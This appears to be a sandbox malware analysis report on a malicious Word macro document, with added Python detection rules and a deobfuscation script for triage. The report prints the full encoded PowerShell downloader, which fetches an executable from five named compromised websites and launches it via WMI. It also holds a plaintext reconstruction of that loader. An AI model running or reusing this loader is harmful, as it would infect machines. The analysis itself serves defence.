Analysis
max time kernel: 29s
max time network: 31s
resource: win7v191014
submitted: 04-02-2020 09:40
Task: task1
Sample: 3b462b9a1e59ff9c79bc1be87dbea02822415c3a0ddfecce296b4257269cad5e.doc
Resource: win7v191014
0 signatures
General
Target: 3b462b9a1e59ff9c79bc1be87dbea02822415c3a0ddfecce296b4257269cad5e.doc
Sample: 200204-2vbpsamrx2
SHA256: 3b462b9a1e59ff9c79bc1be87dbea02822415c3a0ddfecce296b4257269cad5e
Score: 10/10
Malware Config
Extracted
Language: ps1
Source:
URLs (exe.dropper):
http://crimecitynews.com/wp-includes/DeHZs1/
http://clicksbyayush.com/wp-content/T721/
https://www.hgklighting.com/dacecb0fcd2bc6cbe09ed1527e527b37/pwdSS610g/
http://cheapwebvn.net/wp-content/cache/uZLPqwbGic/
http://sundevilstudentwork.com/wp-content/N4h2nKXI/
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
pid | process
856 | WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
pid | process
488 | PoWERsheLL.exe
Drops file in System32 directory 1 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | PoWERsheLL.exe
Executes dropped EXE 1 IoCs
Processes:
pid | process
1808 | 894.exe
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 280 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{BA72FF25-D9D0-41B1-ACDB-914482F611CD}\2.0\FLAGS | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{BA72FF25-D9D0-41B1-ACDB-914482F611CD}\2.0\ = "Microsoft Forms 2.0 Object Library" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{BA72FF25-D9D0-41B1-ACDB-914482F611CD} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} | WINWORD.EXE
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
pid | process
856 | WINWORD.EXE
1808 | 894.exe
Process spawned unexpected child process 1 IoCs
Processes:
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 488 | 1528 | PoWERsheLL.exe |
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 488 | PoWERsheLL.exe
Blacklisted process makes network request 2 IoCs
Processes:
flow | pid | process
15 | 488 | PoWERsheLL.exe
17 | 488 | PoWERsheLL.exe
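Three of the signatures above describe the whole chain: WINWORD.EXE spawning PowerShell, PowerShell started with an -e encoded command, and the dropped 894.exe appearing under wmiprvse.exe rather than under PowerShell (the loader starts it through WMI Win32_Process.Create, so the WMI provider host becomes the parent). The following is an added Python example, not part of the sandbox report, that turns those three observations into process-tree checks and runs them over constructed process-creation events in the shape of Sysmon Event ID 1. The events mirror this report's tree; the explorer.exe ancestry, the pid 1528 for wmiprvse.exe and the file name invoice.doc are assumed, and the -e blob is only a prefix of the one in the report.

```python
import re
from pathlib import PureWindowsPath

# Constructed events (Sysmon Event ID 1 shape) modelled on this report's process tree.
# pids 856, 488 and 1808 are the report's; 600/700/1528 and explorer.exe are assumed.
EVENTS = [
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 856, "ppid": 600,
     "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "cmd": r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\invoice.doc"'},
    {"pid": 488, "ppid": 856,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\PoWERsheLL.exe",
     "cmd": "PoWERsheLL -e JABLAHcAZQBtAHoAdQBwAHIAdQBmAD0AJwBGAG4AawBnAGcAegB2AHQAJwA7"},
    {"pid": 1528, "ppid": 700, "image": r"C:\Windows\System32\wbem\wmiprvse.exe",
     "cmd": r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"},
    {"pid": 1808, "ppid": 1528, "image": r"C:\Users\Admin\894.exe", "cmd": r"C:\Users\Admin\894.exe"},
    # Benign control: an admin script launched from the desktop shell, no encoded command.
    {"pid": 2000, "ppid": 600,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# -e / -ec / -en / -enc / -encodedcommand followed by a Base64 run; PowerShell accepts any prefix.
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)
# Anything below a user profile is writable by the user; that is where the loader dropped 894.exe.
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\", re.I)


def basename(path: str) -> str:
    # Case-folded on purpose: NTFS is case-insensitive, so "PoWERsheLL.exe" is powershell.exe
    # to the OS and must be powershell.exe to the rule as well.
    return PureWindowsPath(path).name.lower()


def detect(events):
    """Return (rule, pid) pairs for the three behaviours flagged in the report."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        child = basename(e["image"])
        pname = basename(parent["image"]) if parent else ""
        if pname in OFFICE_APPS and child in SCRIPT_HOSTS:
            alerts.append(("office_spawns_script_host", e["pid"]))
        if child in {"powershell.exe", "pwsh.exe"} and ENCODED_FLAG.search(e["cmd"]):
            alerts.append(("encoded_powershell", e["pid"]))
        # Win32_Process.Create from a script makes wmiprvse.exe the parent, hiding the caller;
        # a user-writable binary under the WMI host is therefore the signal, not the caller.
        if pname == "wmiprvse.exe" and USER_WRITABLE.match(e["image"]):
            alerts.append(("wmi_spawned_user_writable_binary", e["pid"]))
    return alerts


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: pid {pid}")
```

The parent lookup is by pid within the same batch; in a real pipeline use the parent process GUID Sysmon records, because pids are reused and the parent may have exited before the child event is processed.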
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\3b462b9a1e59ff9c79bc1be87dbea02822415c3a0ddfecce296b4257269cad5e.doc"
- Suspicious behavior: AddClipboardFormatListener
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\PoWERsheLL.exe
PoWERsheLL -e JABLAHcAZQBtAHoAdQBwAHIAdQBmAD0AJwBGAG4AawBnAGcAegB2AHQAJwA7ACQATQB2AG0AcgB2AGUAZABnACAAPQAgACcAOAA5ADQAJwA7ACQAQgB0AG0AbgBrAGQAdABxAGIAZQBuAHkAPQAnAEwAcABnAGQAbAByAHIAcABtACcAOwAkAEgAegB5AGkAZgBsAHgAcABhAHMAYwBsAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABNAHYAbQByAHYAZQBkAGcAKwAnAC4AZQB4AGUAJwA7ACQARwBvAHkAZABrAGIAbgBjAGUAZAB0AG0AZwA9ACcAQgBwAGwAdgByAG8AYgBhAHYAagBwACcAOwAkAFMAZABoAGsAZABrAGgAcwBpAHQAPQAuACgAJwBuAGUAdwAtAG8AYgAnACsAJwBqAGUAJwArACcAYwB0ACcAKQAgAE4AZQB0AC4AdwBlAGIAQwBMAEkARQBOAHQAOwAkAFMAegB1AGEAZAB3AHAAcwBlAG8AdwA9ACcAaAB0AHQAcAA6AC8ALwBjAHIAaQBtAGUAYwBpAHQAeQBuAGUAdwBzAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBEAGUASABaAHMAMQAvACoAaAB0AHQAcAA6AC8ALwBjAGwAaQBjAGsAcwBiAHkAYQB5AHUAcwBoAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AVAA3ADIAMQAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AaABnAGsAbABpAGcAaAB0AGkAbgBnAC4AYwBvAG0ALwBkAGEAYwBlAGMAYgAwAGYAYwBkADIAYgBjADYAYwBiAGUAMAA5AGUAZAAxADUAMgA3AGUANQAyADcAYgAzADcALwBwAHcAZABTAFMANgAxADAAZwAvACoAaAB0AHQAcAA6AC8ALwBjAGgAZQBhAHAAdwBlAGIAdgBuAC4AbgBlAHQALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AYwBhAGMAaABlAC8AdQBaAEwAUABxAHcAYgBHAGkAYwAvACoAaAB0AHQAcAA6AC8ALwBzAHUAbgBkAGUAdgBpAGwAcwB0AHUAZABlAG4AdAB3AG8AcgBrAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ATgA0AGgAMgBuAEsAWABJAC8AJwAuACIAUwBgAHAATABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABRAGEAbQBoAHcAbwBlAG8AdQBtAD0AJwBBAHcAZQBkAHIAYwB6AHkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFQAbwBkAGYAaQB6AGMAegAgAGkAbgAgACQAUwB6AHUAYQBkAHcAcABzAGUAbwB3ACkAewB0AHIAeQB7ACQAUwBkAGgAawBkAGsAaABzAGkAdAAuACIARABgAE8AVwBuAGwAbwBBAGQAZgBgAGkAYABMAGUAIgAoACQAVABvAGQAZgBpAHoAYwB6ACwAIAAkAEgAegB5AGkAZgBsAHgAcABhAHMAYwBsACkAOwAkAEIAZABxAHkAawBmAG8AZAB1AHYAawA9ACcARABxAGwAcQBzAGEAeQBnAGMAdgAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEgAegB5AGkAZgBsAHgAcABhAHMAYwBsACkALgAiAEwAYABFAE4AYABHAHQASAAiACAALQBnAGUAIAAzADQAMgAyADEAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAEMAYABSAGAARQBhAFQAZQAiACgAJABIAHoAeQBpAGYAbAB4AHAAYQBzAGMAbAApADsAJABXAHgAZABnAHAAcwBuAGEAeQBpAHIAeAA9ACcAQQByAHMAdQBzAHkAbABiAG0AZgBtAGgAeAAnADsAYgByAGUAYQBrADsAJABaAGkAeABoAHQAaQBxAHoAbgBnAD0AJwBLAGYAaQB1AHMAbwBiAHgAbwBqAGEAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwB2AGsAeAB1AGgAdQBuAHEAegBhAHQAPQAnAFAAagByAGYAbwB6AGoAYgB3AGUAJwA=
- Suspicious behavior: EnumeratesProcesses
- Drops file in System32 directory
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
-
C:\Users\Admin\894.exe
C:\Users\Admin\894.exe
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
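The PoWERsheLL command line above is an -EncodedCommand: the Base64 decodes to UTF-16LE PowerShell, which is where the "Malware Config" URLs, the 894.exe drop name and the size check come from. The following is an added Python example, not part of the sandbox report, that decodes such a blob, undoes the three cheap obfuscations this loader family uses (backtick-split method names such as "D`OWnloAdf`i`Le", cmdlet names built from concatenated literals such as 'new-ob'+'je'+'ct', and [char]42 standing in for the '*' URL separator) and extracts the URL list, drop path, minimum size and launch method. The embedded script is a constructed sample in the same shape as the decoded payload, reusing the URLs, file name and 34221-byte threshold that appear in this report; it is not the verbatim decoded command. Run it with the report's blob as the first argument to decode the real one.

```python
import base64
import re
import sys

# Constructed sample in the shape of the decoded -e payload (variable names illustrative).
SAMPLE_SCRIPT = (
    "$Mvmrvedg = '894';"
    "$Hzyiflxpascl=$env:userprofile+'\\'+$Mvmrvedg+'.exe';"
    "$Sdhkdkhsit=.('new-ob'+'je'+'ct') Net.webCLIENt;"
    "$Szuadwpseow='http://crimecitynews.com/wp-includes/DeHZs1/*"
    "http://clicksbyayush.com/wp-content/T721/*"
    "https://www.hgklighting.com/dacecb0fcd2bc6cbe09ed1527e527b37/pwdSS610g/*"
    "http://cheapwebvn.net/wp-content/cache/uZLPqwbGic/*"
    "http://sundevilstudentwork.com/wp-content/N4h2nKXI/'.\"S`pLIT\"([char]42);"
    "foreach($Todfizcz in $Szuadwpseow){try{"
    "$Sdhkdkhsit.\"D`OWnloAdf`i`Le\"($Todfizcz, $Hzyiflxpascl);"
    "If ((.('Ge'+'t-'+'Item') $Hzyiflxpascl).\"L`EN`GtH\" -ge 34221) "
    "{([wmiclass]'win32_Process').\"C`R`EaTe\"($Hzyiflxpascl);break}}catch{}}"
)


def encode_command(script: str) -> str:
    """Produce what powershell.exe -e expects: Base64 over the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(blob: str) -> str:
    """Reverse -EncodedCommand. Tolerates line breaks from a report copy-paste and
    restores '=' padding if it was lost on the way."""
    blob = re.sub(r"\s+", "", blob)
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-16le")


def deobfuscate(script: str) -> str:
    # [char]42 -> '*': numeric char codes hide the URL list separator.
    s = re.sub(r"\[char\](\d+)", lambda m: "'" + chr(int(m.group(1))) + "'", script)
    # "D`OWnloAdf`i`Le" -> "DOWnloAdfiLe": a backtick before an ordinary letter is a no-op
    # escape inside a double-quoted string. (Genuine escapes such as `n are dropped too,
    # which is acceptable for IOC extraction.)
    s = re.sub(r"`(?=[A-Za-z])", "", s)
    # ('new-ob'+'je'+'ct') -> 'new-object': join adjacent single-quoted literals to a fixpoint.
    prev = None
    while prev != s:
        prev = s
        s = re.sub(r"'([^']*)'\s*\+\s*'([^']*)'", r"'\1\2'", s)
    return s


def extract_iocs(script: str) -> dict:
    s = deobfuscate(script)
    literals = dict(re.findall(r"\$(\w+)\s*=\s*'([^']*)'", s))  # $Name = 'value'
    iocs = {"urls": [], "drop_path": None, "min_size": None, "launch": None}

    # '<url>*<url>*...'.split('*')  (method name already de-backticked; case ignored)
    m = re.search(r"'(https?://[^']+)'\.\"?split\"?\('(.)'\)", s, re.I)
    if m:
        iocs["urls"] = m.group(1).split(m.group(2))

    # $env:userprofile+'\'+$Name+'.exe' with $Name resolved from the literal table
    m = re.search(r"\$env:(\w+)\s*\+\s*'\\'\s*\+\s*\$(\w+)\s*\+\s*'([^']*)'", s, re.I)
    if m:
        name = literals.get(m.group(2), "$" + m.group(2))
        iocs["drop_path"] = f"%{m.group(1)}%\\{name}{m.group(3)}"

    # (Get-Item $path).Length -ge N: only a full download counts, an error page is skipped
    m = re.search(r"\.\"?length\"?\s+-ge\s+(\d+)", s, re.I)
    if m:
        iocs["min_size"] = int(m.group(1))

    # Win32_Process.Create detaches the child from PowerShell; it shows up under wmiprvse.exe
    if re.search(r"\[wmiclass\]\s*'win32_process'\s*\)?\s*\.\s*\"?create\"?", s, re.I):
        iocs["launch"] = "WMI Win32_Process.Create"
    elif re.search(r"start-process|invoke-item|\.start\(", s, re.I):
        iocs["launch"] = "direct (Start-Process / Invoke-Item / Process.Start)"
    return iocs


if __name__ == "__main__":
    blob = sys.argv[1] if len(sys.argv) > 1 else encode_command(SAMPLE_SCRIPT)
    script = decode_encoded_command(blob)
    print(deobfuscate(script))
    for key, value in extract_iocs(script).items():
        print(f"{key}: {value}")
```

The regexes are deliberately narrow to this loader's idioms; a blob that uses a different download primitive or builds the path another way will come back with empty fields rather than a wrong guess, which is the behaviour you want from a triage script.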
Network
MITRE ATT&CK Matrix
Downloads
-
C:\Users\Admin\894.exe
-
C:\Users\Admin\894.exe
-
- memory/856-0-0x0000000005BD0000-0x0000000005CD0000-memory.dmp (Filesize 1024KB)
- memory/856-2-0x0000000007BA0000-0x0000000007BA4000-memory.dmp (Filesize 16KB)
- memory/856-5-0x0000000009FA0000-0x0000000009FA4000-memory.dmp (Filesize 16KB)
- memory/856-6-0x000000000B020000-0x000000000B024000-memory.dmp (Filesize 16KB)